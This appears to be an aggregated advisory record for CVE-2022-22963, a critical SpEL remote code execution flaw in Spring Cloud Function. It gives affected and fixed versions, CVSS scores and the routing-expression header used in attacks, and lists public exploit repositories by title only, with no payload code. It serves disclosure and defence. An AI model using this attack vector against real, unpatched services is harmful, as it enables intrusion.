ID CVE-2022-22963 Type cve Reporter security@vmware.com Modified 2022-04-20T00:16:00
Description
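In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when the routing functionality is in use, a user can supply a specially crafted Spring Expression Language (SpEL) expression as the routing-expression, which may result in remote code execution and access to local resources. The CPE configuration in the record below scopes this to releases up to and including 3.1.6 and to 3.2.0 through 3.2.2, and the Spring announcement quoted in the same record names 3.1.7 and 3.2.3 as the fixed releases. The record classifies the flaw as CWE-94 and scores it 9.8 (CRITICAL) under CVSS 3.1 against 7.5 under CVSS 2.0. The references quoted below show the expression arriving in an HTTP request header named `spring.cloud.function.routing-expression`, so that header is the one to inspect in proxy, WAF and access logs for services that have not yet been upgraded.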
{"id": "CVE-2022-22963", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2022-22963", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "published": "2022-04-01T23:15:00", "modified": "2022-04-20T00:16:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22963", "reporter": "security@vmware.com", "references": ["https://tanzu.vmware.com/security/cve-2022-22963", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005", "https://www.oracle.com/security-alerts/cpuapr2022.html"], "cvelist": ["CVE-2022-22963"], "immutableFields": [], "lastseen": "2022-04-20T05:55:31", "viewCount": 258, "enchantments": 
{"twitter": {"counter": 2, "tweets": [{"link": "https://twitter.com/Alra3ees/status/1525827005564039171", "text": "SpringScan Burp detection plugin:-\n\nSupport for detecting vulnerabilities:-\n Spring Core RCE (CVE-2022-22965)\n Spring Cloud Function SpEL RCE (CVE-2022-22963)\n Spring Cloud GateWay SPEL RCE (CVE-2022-22947)\n\nhttps://t.co/gDhXH19mpB", "author": "Alra3ees", "author_photo": "https://pbs.twimg.com/profile_images/830874453680680962/BexDw2YA_400x400.jpg"}]}, "vulnersScore": "PENDING"}, "_state": {"twitter": 1652623204}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:vmware:spring_cloud_function:3.2.2", "cpe:/a:vmware:spring_cloud_function:3.1.6"], "cpe23": ["cpe:2.3:a:vmware:spring_cloud_function:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_cloud_function:3.2.2:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "affectedSoftware": [{"cpeName": "vmware:spring_cloud_function", "version": "3.1.6", "operator": "le", "name": "vmware spring cloud function"}, {"cpeName": "vmware:spring_cloud_function", "version": "3.2.2", "operator": "le", "name": "vmware spring cloud function"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:vmware:spring_cloud_function:3.1.6:*:*:*:*:*:*:*", "versionEndIncluding": "3.1.6", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:vmware:spring_cloud_function:3.2.2:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndIncluding": "3.2.2", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://tanzu.vmware.com/security/cve-2022-22963", "name": "https://tanzu.vmware.com/security/cve-2022-22963", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH", "name": "20220401 Vulnerability in Spring Cloud Function Framework Affecting Cisco Products: March 2022", 
"refsource": "CISCO", "tags": ["Third Party Advisory"]}, {"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005", "name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005", "refsource": "CONFIRM", "tags": ["Third Party Advisory"]}, {"url": "https://www.oracle.com/security-alerts/cpuapr2022.html", "name": "https://www.oracle.com/security-alerts/cpuapr2022.html", "refsource": "MISC", "tags": []}]}
{"checkpoint_advisories": [{"lastseen": "2022-04-07T03:29:32", "description": "A remote code execution vulnerability exists in Spring Cloud Function. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Spring Cloud Function Remote Code Execution (CVE-2022-22963)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T00:00:00", "id": "CPAI-2022-0096", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-05-03T17:58:48", "description": "In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T00:00:59", "type": "github", "title": "Code Injection in Spring Cloud Function", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-03T17:41:55", "id": "GHSA-6V73-FGF6-W5J7", "href": "https://github.com/advisories/GHSA-6v73-fgf6-w5j7", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-05-12T00:09:54", "description": "spring-cloud-function-context is vulnerable to remote code execution. 
The routing functionality allows a user to provide a malicious SpEL as a routing-expression which would allow arbitrary OS commands to be executed remotely.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T01:51:42", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-20T05:51:00", "id": "VERACODE:34884", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34884/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "spring": [{"lastseen": "2022-04-27T14:58:04", "description": "We have released Spring Cloud Function [3.1.7](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.1.7/>) & [3.2.3](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.2.3/>) to address the following CVE report.\n\n * [CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression](<https://tanzu.vmware.com/security/cve-2022-22963>)\n\nPlease review 
the information in the CVE report and upgrade immediately.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T00:53:00", "type": "spring", "title": "CVE report published for Spring Cloud Function", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-30T00:53:00", "id": "SPRING:5D790268422545C1CFB6959B07261E50", "href": "https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-11T17:49:11", "description": "# SpringCloudFunction-Research\nCVE-2022-22963 research\n\n# \u74b0\u5883\n* v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-04-05T17:06:55", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-07T10:59:37", "id": "2EBB728F-8FCC-57DB-8AC5-50BB5C51500E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-18T22:28:40", "description": "# CVE-2022-22963\nCVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_\u6f0f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T11:36:42", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-18T18:49:05", "id": "D71757FD-E7A3-525B-8B2B-FB1D6DC37D11", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-06T01:33:34", "description": "# Spring Cloud Function Vulnerability(CVE-2022-22963)\n\nVulnerabl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T14:32:14", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-06T01:29:18", "id": "BD7F2851-5090-5010-8C27-4B3CCF48ADE1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:27", "description": "# Spring Cloud Function SpEL - cve-2022-22963\n## Build\n```bash\n$...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T06:45:51", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-03T07:36:26", "id": "8D79D09C-1FB6-5C99-89C0-D839A4817791", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:50:05", "description": "# CVE-2022-22963 RCE PoC\n\nMinimal example to reproduce CVE-2022-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T17:37:35", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-07T15:01:56", "id": "723B41AF-E5A8-5571-BA74-FA8924B88606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-13T08:14:17", "description": "# Spring Core RCE\nA Proof-of-Concept (**PoC**) of the **Spring C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T14:29:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-13T06:46:21", "id": "19D93D49-F907-5A3B-9FA2-ED9EFE3A45E0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-14T19:27:06", 
"description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T05:04:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-05-14T12:20:44", "id": "82AB8274-DF0B-58B4-8C3C-3CE19E21A0C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-27T03:11:46", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T11:14:46", "type": "githubexploit", "title": 
"Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T11:22:08", "id": "AD1045B7-6DFA-557C-81B2-18F96F0F68A2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:50:00", "description": "# Spring Core RCE - CVE-2022-22963\n\n> Following Spring Cloud, on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T19:07:35", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T05:38:27", "id": "3D40E0AE-D155-5852-986D-A5FF3880E230", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:16:05", "description": "# CVE-2022-22963\nTo run the vulnerable SpringBoot application ru...", "cvss3": {}, "published": "2022-03-30T15:49:32", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T08:56:16", "id": "F340F3AE-7288-5EF0-85A3-DAB6576064D5", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-28T04:18:46", "description": "# Spring Cloud Function SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2022-22963\uff09\r\n\r\n>Spring\u6846\u67b6...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T11:10:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": 
"2022-04-28T02:01:35", "id": "3389F104-810F-5B22-8F78-C961A94A8C27", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-01T02:33:23", "description": "# springhound\nCreated after the release of CVE-2022-22965 a...", "cvss3": {}, "published": "2022-04-01T00:34:29", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:47:30", "id": "D30073F4-9BB7-54D9-A5F6-DCCA5A005D4D", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-04T23:38:35", "description": "# CVE-2022-22965 aka \"Spring4Shell\"\n> Vulnerabilidad RCE en Spri...", "cvss3": {}, "published": "2022-03-31T16:14:36", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T02:03:07", "id": "75235F83-D7F4-570F-B966-72159CCBA5CB", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-03T13:20:46", "description": "# Spring CVE\nThis includes CVE-2022-22963, a Spring SpEL / Expre...", "cvss3": {}, "published": "2022-03-31T20:19:51", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T07:36:29", "id": "6E5C078B-B2FA-520B-964A-D7055FD4EB0A", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-03-23T21:28:22", "description": "# CVE-2022-XXXX\n\n abstracts all transport details and infrastructure, allowing developers to keep all familiar tools and processes and focus on business logic. \n\n### Problem\n\nSpring Cloud Function has remote code execution vulnerability. 
